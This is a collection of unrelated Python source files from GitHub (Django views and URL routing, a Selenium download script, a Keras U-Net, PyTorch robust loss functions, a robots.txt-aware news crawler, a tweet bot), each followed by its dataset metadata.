if isinstance(url, RegexURLResolver):
if pre_namespace:
if url.namespace:
namespace = '%s:%s' % (pre_namespace, url.namespace)
else:
namespace = pre_namespace
else:
if url.namespace:
namespace = url.namespace # 'rbac'
else:
namespace = None
recursion_urls(namespace, pre_url + url.regex.pattern, url.url_patterns, url_ordered_dict)
else:
if pre_namespace:
name = '%s:%s' % (pre_namespace, url.name) # rbac:role_list
else:
name = url.name
if not url.name:
raise Exception('URL路由中必须设置name属性')
url = pre_url + url._regex # /^^login/
url_ordered_dict[name] = {
'url_name': name, 'url': url.replace('^', '').replace('$', '')
} # {'login':{'url_name': name, 'url': /login/},}
def all_url(ignore_namespace_list=None):
ignore_list = ignore_namespace_list or []
# 存放项目所有URL的有序字典
url_ordered_dict = OrderedDict()
# 获取项目的所以URL
urls = import_string(settings.ROOT_URLCONF)
urlpatterns = []
'''
# urlpatterns = [
# url(r'^', include('web.urls')),
# url(r'^rbac/', include('rbac.urls', namespace='rbac')),
# ]
'''
for url in urls.urlpatterns:
if isinstance(url, RegexURLResolver) and url.namespace in ignore_list:
continue
urlpatterns.append(url)
recursion_urls(None, '/', urlpatterns, url_ordered_dict)
return url_ordered_dict
| heyhito/CRM | rbac/server/routes.py | routes.py | py | 2,278 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.RegexURLResolver",
"line_number": 16,
"usage_type": "argument"
},
{
"api_name": "collections.OrderedDict",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "django.utils.module_loading.import_string",
"line_number": 47,
"usage_type": "ca... |
71399122025 |
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
import time
driver = webdriver.Firefox()
driver.get('https://github.com/Vidoosh/Image-colorizer')
time.sleep(2)
code = driver.find_element(By.CSS_SELECTOR, '#repo-content-pjax-container > div > div > div.Layout.Layout--flowRow-until-md.Layout--sidebarPosition-end.Layout--sidebarPosition-flowRow-end > div.Layout-main > div.file-navigation.mb-3.d-flex.flex-items-start > span.d-none.d-md-flex.ml-2 > get-repo > feature-callout')
code.click()
time.sleep(1)
try:
download = driver.find_element(By.CSS_SELECTOR, '#local-panel > ul > li:nth-child(3) > a')
download.click()
print("Download initiated successfully")
except NoSuchElementException as e:
print("Download button not found")
finally:
driver.quit()
| sravanithummapudi/st | download_button.py | download_button.py | py | 901 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.Firefox",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "time.sleep",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "selenium.web... |
71666166824 | # The following code was adapted from Week 3 Programming Assignment 2 in the Convolutional Neural Networks course by DeepLearning.AI offered on Coursera
# https://www.coursera.org/learn/convolutional-neural-networks/home/week/3
import tensorflow as tf
import numpy as np
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.layers import Dropout
from tensorflow.keras.layers import Conv2DTranspose
from tensorflow.keras.layers import concatenate
import os
import numpy as np
import pandas as pd
import imageio
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
# load and split data
path = ''
image_path = os.path.join(path, './data/CameraRGB/')
mask_path = os.path.join(path, './data/CameraMask/')
image_list = os.listdir(image_path)
mask_list = os.listdir(mask_path)
image_list = [image_path+i for i in image_list]
mask_list = [mask_path+i for i in mask_list]
image_list_ds = tf.data.Dataset.list_files(image_list, shuffle=False)
mask_list_ds = tf.data.Dataset.list_files(mask_list, shuffle=False)
image_filenames = tf.constant(image_list)
masks_filenames = tf.constant(mask_list)
dataset = tf.data.Dataset.from_tensor_slices((image_filenames, masks_filenames))
# preprocess data
def process_path(image_path, mask_path):
img = tf.io.read_file(image_path)
img = tf.image.decode_png(img, channels=3)
img = tf.image.convert_image_dtype(img, tf.float32)
mask = tf.io.read_file(mask_path)
mask = tf.image.decode_png(mask, channels=3)
mask = tf.math.reduce_max(mask, axis=-1, keepdims=True)
return img, mask
def preprocess(image, mask):
input_image = tf.image.resize(image, (96, 128), method='nearest')
input_mask = tf.image.resize(mask, (96, 128), method='nearest')
return input_image, input_mask
image_ds = dataset.map(process_path)
processed_image_ds = image_ds.map(preprocess)
"""
This function implements the convolutional decoder block
"""
def upsampling_block(expansive_input, contractive_input, n_filters=32):
# expansive_input is the input from the previous layer
# contractive_input is the input from the previous skip layer
up = Conv2DTranspose(n_filters, 3, strides=2, padding='same')(expansive_input)
# merge the previous output and the contractive_input
merge = concatenate([up, contractive_input], axis=3)
conv = Conv2D(n_filters, 3, activation='relu', padding='same', kernel_initializer='HeNormal')(merge)
conv = Conv2D(n_filters, 3, activation='relu', padding='same', kernel_initializer='HeNormal')(conv)
return conv
"""
This function implements the U-Net model by combining the encoder and decoder paths
"""
def unet_model(input_size=(96, 128, 3), n_filters=32, n_classes=23):
# input_size is the shape of the input
# n_filters is the number of filters for convolutional layers
# n_classes is the number of output classes
inputs = Input(input_size)
# encoding path
cblock1 = conv_block(inputs, n_filters)
# the first element of the output of each block will be the input of the next block
# the number of filters at each new step doubles
cblock2 = conv_block(cblock1[0], n_filters*2)
cblock3 = conv_block(cblock2[0], n_filters*4)
cblock4 = conv_block(cblock3[0], n_filters*8, dropout_prob=0.3)
cblock5 = conv_block(cblock4[0], n_filters*16, dropout_prob=0.3, max_pooling=False)
# decoding path
ublock6 = upsampling_block(cblock5[0], cblock4[1], n_filters*8)
# the output of the previous block is the expansive_input and the corresponding encoder output skip connection is the contractive_input
# the number of filters at each new step halves
ublock7 = upsampling_block(ublock6, cblock3[1], n_filters*4)
ublock8 = upsampling_block(ublock7, cblock2[1], n_filters*2)
ublock9 = upsampling_block(ublock8, cblock1[1], n_filters)
conv9 = Conv2D(n_filters, 3, activation='relu', padding='same', kernel_initializer='he_normal')(ublock9)
conv10 = Conv2D(n_classes, 1, padding='same')(conv9)
model = tf.keras.Model(inputs=inputs, outputs=conv10)
return model
# set model dimensions
img_height = 96
img_width = 128
num_channels = 3
unet = unet_model((img_height, img_width, num_channels))
unet.compile(optimizer='adam',
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
"""
This function displays both the input image and the corresponding true mask (desired output)
"""
def display(display_list):
plt.figure(figsize=(15, 15))
title = ['Input Image', 'True Mask', 'Predicted Mask']
for i in range(len(display_list)):
plt.subplot(1, len(display_list), i+1)
plt.title(title[i])
plt.imshow(tf.keras.preprocessing.image.array_to_img(display_list[i]))
plt.axis('off')
plt.show()
# create prediction
def create_mask(pred_mask):
pred_mask = tf.argmax(pred_mask, axis=-1)
pred_mask = pred_mask[..., tf.newaxis]
return pred_mask[0]
# train the model
EPOCHS = 40
VAL_SUBSPLITS = 5
BUFFER_SIZE = 500
BATCH_SIZE = 32
processed_image_ds.batch(BATCH_SIZE)
train_dataset = processed_image_ds.cache().shuffle(BUFFER_SIZE).batch(BATCH_SIZE)
print(processed_image_ds.element_spec)
model_history = unet.fit(train_dataset, epochs=EPOCHS)
"""
This function displays the input, prediction, and true images
"""
def show_predictions(dataset=None, num=1):
"""
Displays the first image of each of the num batches
"""
if dataset:
for image, mask in dataset.take(num):
pred_mask = unet.predict(image)
display([image[0], mask[0], create_mask(pred_mask)])
else:
display([sample_image, sample_mask,
create_mask(unet.predict(sample_image[tf.newaxis, ...]))])
# show results
show_predictions(train_dataset, 6)
# References
# [1] https://www.coursera.org/learn/convolutional-neural-networks/programming/omqTR/image-segmentation-with-u-net
| AndrewZhang126/Neural-Networks | U-Net.py | U-Net.py | py | 6,154 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 2... |
33377706423 | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
eps = 1e-7
class SCELoss(nn.Module):
def __init__(self, num_classes=10, a=1, b=1):
super(SCELoss, self).__init__()
self.num_classes = num_classes
self.a = a
self.b = b
self.cross_entropy = nn.CrossEntropyLoss()
def forward(self, pred, labels):
ce = self.cross_entropy(pred, labels)
# RCE
pred = F.softmax(pred, dim=1)
pred = torch.clamp(pred, min=eps, max=1.0)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
label_one_hot = torch.clamp(label_one_hot, min=1e-4, max=1.0)
rce = (-1 * torch.sum(pred * torch.log(label_one_hot), dim=1))
loss = self.a * ce + self.b * rce.mean()
return loss
class RCELoss(nn.Module):
def __init__(self, num_classes=10, scale=1.0):
super(RCELoss, self).__init__()
self.num_classes = num_classes
self.scale = scale
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
pred = torch.clamp(pred, min=eps, max=1.0)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
label_one_hot = torch.clamp(label_one_hot, min=1e-4, max=1.0)
loss = (-1 * torch.sum(pred * torch.log(label_one_hot), dim=1))
return self.scale * loss.mean()
class NRCELoss(nn.Module):
def __init__(self, num_classes, scale=1.0):
super(NRCELoss, self).__init__()
self.num_classes = num_classes
self.scale = scale
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
pred = torch.clamp(pred, min=eps, max=1.0)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
label_one_hot = torch.clamp(label_one_hot, min=1e-4, max=1.0)
norm = 1 / 4 * (self.num_classes - 1)
rce = (-1 * torch.sum(pred * torch.log(label_one_hot), dim=1))
return self.scale * norm * rce.mean()
class NCELoss(nn.Module):
def __init__(self, num_classes, scale=1.0):
super(NCELoss, self).__init__()
self.num_classes = num_classes
self.scale = scale
def forward(self, pred, labels):
pred = F.log_softmax(pred, dim=1)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
loss = -1 * torch.sum(label_one_hot * pred, dim=1) / (-pred.sum(dim=1))
return self.scale * loss.mean()
class MAELoss(nn.Module):
def __init__(self, num_classes=10, scale=2.0):
super(MAELoss, self).__init__()
self.num_classes = num_classes
self.scale = scale
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
loss = 1. - torch.sum(label_one_hot * pred, dim=1)
return self.scale * loss.mean()
class NMAE(nn.Module):
def __init__(self, num_classes=10, scale=1.0):
super(NMAE, self).__init__()
self.num_classes = num_classes
self.scale = scale
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
norm = 1 / (self.num_classes - 1)
loss = 1. - torch.sum(label_one_hot * pred, dim=1)
return self.scale * norm * loss.mean()
class GCELoss(nn.Module):
def __init__(self, num_classes=10, q=0.7):
super(GCELoss, self).__init__()
self.q = q
self.num_classes = num_classes
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
pred = torch.clamp(pred, min=eps, max=1.0)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
loss = (1. - torch.pow(torch.sum(label_one_hot * pred, dim=1), self.q)) / self.q
return loss.mean()
class NGCELoss(nn.Module):
def __init__(self, num_classes=10, q=0.7, scale=1.0):
super(NGCELoss, self).__init__()
self.num_classes = num_classes
self.q = q
self.scale = scale
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
pred = torch.clamp(pred, min=eps, max=1.0)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
numerators = 1. - torch.pow(torch.sum(label_one_hot * pred, dim=1), self.q)
denominators = self.num_classes - pred.pow(self.q).sum(dim=1)
loss = numerators / denominators
return self.scale * loss.mean()
class NCEandRCE(nn.Module):
def __init__(self, alpha=1., beta=1., num_classes=10):
super(NCEandRCE, self).__init__()
self.num_classes = num_classes
self.nce = NCELoss(num_classes=num_classes, scale=alpha)
self.rce = RCELoss(num_classes=num_classes, scale=beta)
def forward(self, pred, labels):
return self.nce(pred, labels) + self.rce(pred, labels)
class NCEandMAE(nn.Module):
def __init__(self, alpha=1., beta=1., num_classes=10):
super(NCEandMAE, self).__init__()
self.num_classes = num_classes
self.nce = NCELoss(num_classes=num_classes, scale=alpha)
self.mae = MAELoss(num_classes=num_classes, scale=beta)
def forward(self, pred, labels):
return self.nce(pred, labels) + self.mae(pred, labels)
class NLNL(torch.nn.Module):
def __init__(self, train_loader, num_classes=10, ln_neg=1):
super(NLNL, self).__init__()
self.num_classes = num_classes
self.ln_neg = ln_neg
weight = torch.FloatTensor(num_classes).zero_() + 1.
if not hasattr(train_loader.dataset, 'targets'):
weight = [1] * num_classes
weight = torch.FloatTensor(weight)
else:
for i in range(num_classes):
weight[i] = (torch.from_numpy(np.array(train_loader.dataset.targets)) == i).sum()
weight = 1 / (weight / weight.max())
self.weight = weight.cuda()
self.criterion = torch.nn.CrossEntropyLoss(weight=self.weight)
self.criterion_nll = torch.nn.NLLLoss()
def forward(self, pred, labels):
labels_neg = (labels.unsqueeze(-1).repeat(1, self.ln_neg)
+ torch.LongTensor(len(labels), self.ln_neg).cuda().random_(1, self.num_classes)) % self.num_classes
labels_neg = torch.autograd.Variable(labels_neg)
assert labels_neg.max() <= self.num_classes-1
assert labels_neg.min() >= 0
assert (labels_neg != labels.unsqueeze(-1).repeat(1, self.ln_neg)).sum() == len(labels)*self.ln_neg
s_neg = torch.log(torch.clamp(1. - F.softmax(pred, 1), min=1e-5, max=1.))
s_neg *= self.weight[labels].unsqueeze(-1).expand(s_neg.size()).cuda()
labels = labels * 0 - 100
loss = self.criterion(pred, labels) * float((labels >= 0).sum())
loss_neg = self.criterion_nll(s_neg.repeat(self.ln_neg, 1), labels_neg.t().contiguous().view(-1)) * float((labels_neg >= 0).sum())
loss = ((loss+loss_neg) / (float((labels >= 0).sum())+float((labels_neg[:, 0] >= 0).sum())))
return loss
class FocalLoss(torch.nn.Module):
'''
https://github.com/clcarwin/focal_loss_pytorch/blob/master/focalloss.py
'''
def __init__(self, gamma=0.5, alpha=None, size_average=True):
super(FocalLoss, self).__init__()
self.gamma = gamma
self.alpha = alpha
if isinstance(alpha, (float, int)):
self.alpha = torch.Tensor([alpha, 1-alpha])
if isinstance(alpha, list):
self.alpha = torch.Tensor(alpha)
self.size_average = size_average
def forward(self, input, target):
if input.dim() > 2:
input = input.view(input.size(0), input.size(1), -1) # N,C,H,W => N,C,H*W
input = input.transpose(1, 2) # N,C,H*W => N,H*W,C
input = input.contiguous().view(-1, input.size(2)) # N,H*W,C => N*H*W,C
target = target.view(-1, 1)
logpt = F.log_softmax(input, dim=1)
logpt = logpt.gather(1, target)
logpt = logpt.view(-1)
pt = torch.autograd.Variable(logpt.data.exp())
if self.alpha is not None:
if self.alpha.type() != input.data.type():
self.alpha = self.alpha.type_as(input.data)
at = self.alpha.gather(0, target.data.view(-1))
logpt = logpt * torch.autograd.Variable(at)
loss = -1 * (1-pt)**self.gamma * logpt
if self.size_average:
return loss.mean()
else:
return loss.sum()
class NormalizedFocalLoss(torch.nn.Module):
def __init__(self, gamma=0.5, num_classes=10, alpha=None, size_average=True, scale=1.0):
super(NormalizedFocalLoss, self).__init__()
self.gamma = gamma
self.size_average = size_average
self.num_classes = num_classes
self.scale = scale
def forward(self, input, target):
target = target.view(-1, 1)
logpt = F.log_softmax(input, dim=1)
normalizor = torch.sum(-1 * (1 - logpt.data.exp()) ** self.gamma * logpt, dim=1)
logpt = logpt.gather(1, target)
logpt = logpt.view(-1)
pt = torch.autograd.Variable(logpt.data.exp())
loss = -1 * (1-pt)**self.gamma * logpt
loss = self.scale * loss / normalizor
if self.size_average:
return loss.mean()
else:
return loss.sum()
class NFLandRCE(torch.nn.Module):
def __init__(self, alpha=1., beta=1., num_classes=10, gamma=0.5):
super(NFLandRCE, self).__init__()
self.num_classes = num_classes
self.nfl = NormalizedFocalLoss(gamma=gamma, num_classes=num_classes, scale=alpha)
self.rce = RCELoss(num_classes=num_classes, scale=beta)
def forward(self, pred, labels):
return self.nfl(pred, labels) + self.rce(pred, labels)
class NFLandMAE(torch.nn.Module):
def __init__(self, alpha=1., beta=1., num_classes=10, gamma=0.5):
super(NFLandMAE, self).__init__()
self.num_classes = num_classes
self.nfl = NormalizedFocalLoss(gamma=gamma, num_classes=num_classes, scale=alpha)
self.mae = MAELoss(num_classes=num_classes, scale=beta)
def forward(self, pred, labels):
return self.nfl(pred, labels) + self.mae(pred, labels)
| hitcszx/lnl_sr | losses.py | losses.py | py | 10,369 | python | en | code | 42 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "torch.nn.CrossEntropyLoss",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "torch.nn",
... |
39209701807 | # Create your views here.
from django.shortcuts import render
from team.models import Player
from django.shortcuts import render, get_object_or_404, redirect, render_to_response
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
def home(request):
context = {'message': 'Here is a message!'}
return render(request, "team/home.html", context)
def roster(request):
player_list = Player.objects.all()
paginator = Paginator(player_list, 100)
page = request.GET.get('page')
try:
players=paginator.page(page)
except PageNotAnInteger:
players = paginator.page(1)
except EmptyPage:
players = paginator.page(1)
return render(request, "team/roster.html", {'players': players})
def player(request, pk):
player = get_object_or_404(Player, id=pk)
return render(request, "team/player.html", {'player': player})
| carolinp/Project-1 | team/views.py | views.py | py | 890 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "team.models.Player.objects.all",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "team.models.Player.objects",
"line_number": 12,
"usage_type": "attribute"
},
{
... |
34141195826 | import numpy as np
import torch
from snownlp import SnowNLP
from common_utils import *
from preprocessing.clean_data import batchify
def get_overlap(list1, list2):
"""
Returns a list of words that occur in both list1 and list2.
Also returns total number of words in list1 and in list2 (can be used
to compute similarity as a percentage, if desired)
Args:
list1 (string): filename corresponding to a list of words
list2 (string): filename corresponding to a list of words
Returns:
overlap (list of string): words occuring in both list1 and list2
len1 (int): number of words in list1
len2 (int): number of words in list2
"""
# File to List
wordlist1 = file_to_str(list1)
wordlist2 = file_to_str(list2)
# Tokenize Lists
s1 = SnowNLP(wordlist1) # need to use SnowNLP for Chinese-character lists
s2 = SnowNLP(wordlist2)
# Get List Lengths
wordlist1 = list(set(s1.words))
wordlist2 = list(set(s2.words))
len1 = len(wordlist1)
len2 = len(wordlist2)
# Count Overlapping Words
# overlap = [w2 for w2 in wordlist2 if w2 in wordlist1]
# Alternative to "Count Overlapping Words" with potentially better time complexity
combined_wordset = set(wordlist1).union(set(wordlist2))
overlap = len1 + len2 - len(combined_wordset)
return overlap, len1, len2
def get_embedding_similarity(list1, list2, emb):
"""
Given an embedding for a vocabulary and two lists of words from
that vocabulary, return the cosine distance between the average
word embeddings from each list.
Args:
list1 (string): filename corresponding to a list of words
list2 (string): filename corresponding to a list of words
emb (??): word embedding
"""
raise NotImplementedError
def get_political_diff(list1, list2, model_file):
# Load model and data
model = torch.load(model_file)
model.eval()
data1 = batchify(list1)
data2 = batchify(list2)
# Inference
positives1, positives2 = 0, 0
for in1 in data1:
output1 = model(in1[0]) # no labels
positives1 += (output1.argmax(1) == 1).sum().item()
for in2 in data2:
output2 = model(in2[0])
positives2 += (output2.argmax(1) == 1).sum().item() / len(data2)
return positives1, positives2, len(data1.dataset), len(data2.dataset)
def get_political_ratio(list, model_file):
# Load model and data
model = torch.load(model_file)
model.eval()
data = batchify(list)
# Inference
positives = 0
for in1 in data:
output = model(in1[0]) # no labels
positives += (output.argmax(1) == 1).sum().item()
return positives / len(data.dataset)
def get_longest_subsequence_length(list1, list2):
"""
Returns length of longest subsequence common to list1 and list2.
Also returns total number of words in list1 and in list2 (can be used
to compute similarity as a percentage, if desired)
Args:
list1 (string): filename corresponding to a list of words
list2 (string): filename corresponding to a list of words
Returns:
length (int): length of longest subsequence
len1 (int): number of words in list1
len2 (int): number of words in list2
"""
# File to List
wordlist1 = file_to_str(list1)
wordlist2 = file_to_str(list2)
# Tokenize Lists
s1 = SnowNLP(wordlist1)
s2 = SnowNLP(wordlist2)
# Get List Lengths
wordlist1 = list(s1.words)
wordlist2 = list(s2.words)
len1 = len(wordlist1)
len2 = len(wordlist2)
length = longest_subsequence(wordlist1, wordlist2)
return length, len1, len2
def longest_subsequence(list1, list2):
"""
Return length of longest subsequence common to list1 and list2.
Here, a subsequence is defined as a list of ordered entries
occuring consecutively in a list.
Example:
[1,2,3] and [4] are subsequences of [1,2,3,4]
[1,3,4] and [1,3,2] are not subsequences of [1,2,3,4]
Args:
list1 (list): a list whose elements can be of any class
that implements __eq__
list2 (list): a list whose elements are the same class as
those of list1
Returns:
l (int): the length of the longest subsequence
"""
# T[i, j] will store the length of longest substring
# ending at list1[i] and list2[j]
n = len(list1)
m = len(list2)
T = np.zeros((n, m))
for i in range(n):
for j in range(m):
if list1[i] == list2[j]:
if i == 0 or j == 0:
T[i, j] = 1
else:
T[i, j] = T[i-1, j-1] + 1
return np.max(T)
def _cosine_dist(v1, v2):
return np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
def _euclidean_dist(v1, v2):
return np.linalg.norm(v1 - v2)
def _manhattan_dist(v1, v2):
raise np.linalg.norm(v1 - v2, ord=1)
| JasmineZhangxyz/ewb-ml-censorship | similarity/metrics/list_metrics.py | list_metrics.py | py | 4,969 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "snownlp.SnowNLP",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "snownlp.SnowNLP",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "preprocessing.clean_data.b... |
7784263631 | import twitter
class pytwitter_forecast(NebriOS):
listens_to = ['forecast_date']
def check(self):
return True
def action(self):
auth = twitter.OAuth(shared.ttoken, shared.ttoken_secret, shared.tconsumer_key, shared.tconsumer_secret)
t = twitter.Twitter(auth=auth)
status = "Forecast: " + self.check_city_forecast + " is " + self.forecast_text + " with temperature "+ self.forecast_lo + " - " + self.forecast_hi + " °C for " + self.forecast_date
try:
t.account.verify_credentials()
try:
t.statuses.update(status=status)
# uncomment to update KVP of auth status for checking
#self.pytwitter_update = "Run"
except:
self.pytwitter_update = "Fail"
except:
self.pytwitter_auth = "Fail"
| bandono/nebri | tweet_rain/pytwitter_forecast.py | pytwitter_forecast.py | py | 874 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "twitter.OAuth",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "twitter.Twitter",
"line_number": 13,
"usage_type": "call"
}
] |
32316213655 | import time
import threading
import logging
import traceback
import datetime
import os
import sys
import re
import robotparser as rp
import numpy as np
import random
import util
import decide
import queries
from conn import connect
class Crawler:
'''
Abstract class for crawling a news source.
'''
########################
# #
# Abstract functions #
# #
########################
def sleep(self):
'''
Abstract function for waiting between requests.
Can add additional functionality, such as random sleep times.
'''
return NotImplemented
def is_article(self, url):
'''
Abstract function for determining if a url is an article or not.
Returns True if the url is an article, false otherwise.
'''
return NotImplemented
def extract_date_from_url(self, url):
'''
Abstract function for parsing a date from a url.
Currently crawler only works for sources with dates in their urls.
Takes a url as a string, returns a datetime.date object.
'''
return NotImplemented
############################
# #
# Non-Abstract functions #
# #
############################
def __init__(self, base_url_string):
'''
Not abstract.
Parameters:
base_url_string, a string representing the base url for a source (eg, foxnews.com)
article_regex, a string representing a regex which only matches for articles
'''
self.base_url_string = base_url_string
self.initialize_robots()
def initialize_robots(self):
'''
Not abstract.
Initializes a robot parser for the crawler.
Use self.robot_parser.can_fetch("*", url) to decide if allowed or not.
'''
base_url_string = self.base_url_string
robot_url = util.robots_url(base_url_string)
robot_parser = rp.RobotFileParser()
robot_parser.set_url(robot_url)
robot_parser.read()
self.robot_parser = robot_parser
def decide_next_visit(self, conn, crawl_id, bad_urls):
'''
Not abstract.
Decides which url to visit next.
Returns a dictionary visit_url with two keys
visit_url['id'] - database if of the url to visit
visit_url['url'] - string representation of the url to visit
Returns None if no urls left to visit.
Strategy is to visit anything not visited this crawl, with the following priority:
1) base url
2) internal pages linked from the base url
2) articles which haven't been visited yet, sorted by date
Currently only implemented 1) and 2)
'''
base_url_string = self.base_url_string
# strategy 1 - visit base url if not visited yet (ignore previous crawls)
base_url_id = queries.insert_url(conn, base_url_string)
base_url = {'id': base_url_id, 'url': base_url_string}
visited_base = decide.visited_base_url(conn, crawl_id)
if not visited_base:
return base_url
# strategy 2 - visit any urls linked by the base url that haven't been visited yet (ignore previous crawls)
urls = decide.find_unvisited_links_from_base(conn, crawl_id, base_url_string)
urls = filter(lambda url: self.robot_parser.can_fetch("*", url['url']), urls)
urls = filter(lambda url: url['id'] not in bad_urls, urls)
if len(urls) > 0:
visit_url = random.choice(urls)
return visit_url
# strategy 3 - visit any articles not visited yet (including previous crawls), starting with the most recent
urls = decide.find_unvisited_internal_urls(conn, base_url_string)
urls = filter(lambda url: self.robot_parser.can_fetch("*", url['url']), urls)
urls = filter(lambda url: url['id'] not in bad_urls, urls)
urls = filter(lambda url: self.is_article(url['url']), urls)
if len(urls) > 0:
dates = map(lambda url: self.extract_date_from_url(url['url']), urls)
reverse_sorted_dates = np.argsort(np.array(dates))[::-1]
last_date_index = reverse_sorted_dates[0]
visit_url = urls[last_date_index]
return visit_url
return None
def crawl(self):
'''
Not abstract. Begins a crawl.
Crawls until MAX_VISITS is reached, unless:
- self.decide_next_visit(conn) returns None
- Five exceptions in a row
'''
# initialize variables
visits = 0
MAX_VISITS = 1000 # so we don't just keep crawling forever
bad_urls = set() # when a url doesn't work, add url_id to bad_urls, ignore in future
error_count = 0
base_url_string = self.base_url_string
conn = connect()
# initialize logging
initialize_logging(base_url_string)
start_time = time.time()
logging.info('STARTING CRAWL AT TIME: {0}'.format(util.time_string(start_time)))
# initlialize database for this crawl
base_url_id = queries.insert_url(conn, base_url_string)
source_id = queries.insert_source(conn, base_url_string)
crawl_id = queries.insert_crawl(conn, base_url_string)
while True:
if error_count == 5:
logging.error('Too many exceptions in a row, exiting.')
break
visit_url = self.decide_next_visit(conn, crawl_id, bad_urls)
if visit_url is None:
logging.info('Finished crawling, no more urls to visit.')
break
try:
logging.info('Visiting {}'.format(visit_url['url']))
self.visit(conn, crawl_id, source_id, visit_url)
error_count = 0
except Exception as e:
logging.error('Error when downloading {0}'.format(visit_url['url']))
logging.error(traceback.format_exc())
bad_urls.add(visit_url['id'])
error_count += 1
visits += 1
if visits == MAX_VISITS:
logging.info('Finished crawling, reached max visits of {}'.format(MAX_VISITS))
break
self.sleep()
def visit(self, conn, crawl_id, source_id, visit_url):
'''
Not abstract. Visits a url during a crawl.
Inserts all relevant information to the database for a single visit.
Inserts article information if the url matches the article regex.
'''
visit_url_id = visit_url['id']
visit_url_string = visit_url['url']
base_url_string = self.base_url_string
html = util.download_html(visit_url_string)
found_links = util.extract_links(html, base_url_string)
visit_id = queries.insert_visit(conn, crawl_id, visit_url_id)
new_url_ids = queries.insert_urls(conn, found_links)
queries.insert_links(conn, visit_id, new_url_ids)
if self.is_article(visit_url_string):
article = util.extract_article(html, visit_url_string)
article_title = article.title
article_text = article.text
article_date = self.extract_date_from_url(visit_url_string)
queries.insert_article(conn, visit_url_id, article_title, article_text, article_date, source_id)
def initialize_logging(base_url):
log_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'logs')
if not os.path.exists(log_dir):
os.makedirs(log_dir)
source_str = util.extract_source(base_url)
log_filename = 'LOG_{0}.log'.format(source_str)
log_path = os.path.join(log_dir, log_filename)
logging.basicConfig(filename=log_path, filemode='a', level=logging.INFO)
stderrLogger=logging.StreamHandler()
stderrLogger.setFormatter(logging.Formatter(logging.BASIC_FORMAT))
logging.getLogger().addHandler(stderrLogger)
sys.excepthook = log_unchecked_exception
def log_unchecked_exception(exctype, value, tb):
traceback.print_tb(tb)
log_str = '''
UNCHECKED EXCEPTION
Type: {}
Value: {}
Traceback: {}'''.format(exctype, value, traceback.print_tb(tb))
logging.error(log_str)
| bentruitt/TopicStory | topicstory/crawler/crawler.py | crawler.py | py | 8,339 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "util.robots_url",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "robotparser.RobotFileParser",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "queries.insert_url",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "decide... |
18482541642 | import torch
import torch.nn as nn
import torch.nn.functional as F
from .utils import weight_reduce_loss
class FocalLoss(nn.Module):
def __init__(self,
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
reduction='mean',
loss_weight=1.0):
super(FocalLoss, self).__init__()
assert use_sigmoid is True, 'Only sigmoid focal loss supported now.'
self.use_sigmoid = use_sigmoid
self.gamma = gamma
self.alpha = alpha
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self,
pred,
target,
weight=None,
avg_factor=None):
device = pred.device
assert pred.shape[0] == target.shape[0]
if len(target.shape) == 1:
target = torch.zeros(
pred.shape,
dtype=torch.long,
device=device).scatter_(
1, target.view(-1, 1), 1)
pred_sigmoid = pred.sigmoid()
pred_sigmoid = torch.clamp(pred_sigmoid, 1e-4, 1.0 - 1e-4)
target = target.type_as(pred)
pt = (1 - pred_sigmoid) * target + pred_sigmoid * (1 - target)
focal_weight = (self.alpha * target + (1 - self.alpha) *
(1 - target)) * pt.pow(self.gamma)
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none') * focal_weight
